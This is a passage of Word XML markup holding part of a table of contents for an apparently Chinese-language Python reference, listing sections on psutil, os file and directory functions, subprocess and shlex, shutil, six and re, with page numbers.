              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="438B7426" w14:textId="43FDF9E7" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779927" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>比较两个时间字符串</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779927 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>472</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57F3AAD9" w14:textId="7A902EBB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779928" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>psutil</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：获取主机信息</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779928 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39EE26E4" w14:textId="4FC4EE0F" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779929" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>cpu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779929 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0056CD6D" w14:textId="5A02E573" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779930" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779930 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1D1384D9" w14:textId="2F19CB3E" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779931" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.listdir:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>列出目录下文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779931 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>473</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10DC3FCB" w14:textId="25D33C51" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779932" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.path</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779932 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>474</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C881121" w14:textId="523D5667" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779933" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.chdir:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>修改当前工作目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779933 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>474</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B061CA5" w14:textId="694EF05A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779934" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.makedirs:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建多层目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779934 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>475</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7485B0F1" w14:textId="55CD87B1" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779935" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.remove:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>删除非目录的文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779935 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>475</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47E206EF" w14:textId="2FDF0845" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779936" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.rmdir:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>删除目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779936 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>475</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4530E28E" w14:textId="46676699" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779937" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>os.walk:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>遍历子目录及文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779937 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>475</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F70325B" w14:textId="58142782" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779938" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>mkdirs:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建不存在的多层目录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779938 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>476</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E48C5EC" w14:textId="7D120449" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779939" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>subprocess</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shlex</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：命令执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779939 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>476</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18DDA1C3" w14:textId="5FEB2363" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779940" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shutil</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779940 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09938412" w14:textId="2DE53EAE" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779941" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>shutil.rmtree:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>删除全部子目录树</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779941 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B3E4BED" w14:textId="5EE4D259" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779942" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>six</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：解决</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py2</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py3</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>分裂的问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779942 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>481</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FF3B571" w14:textId="08108CB4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779943" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>re</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
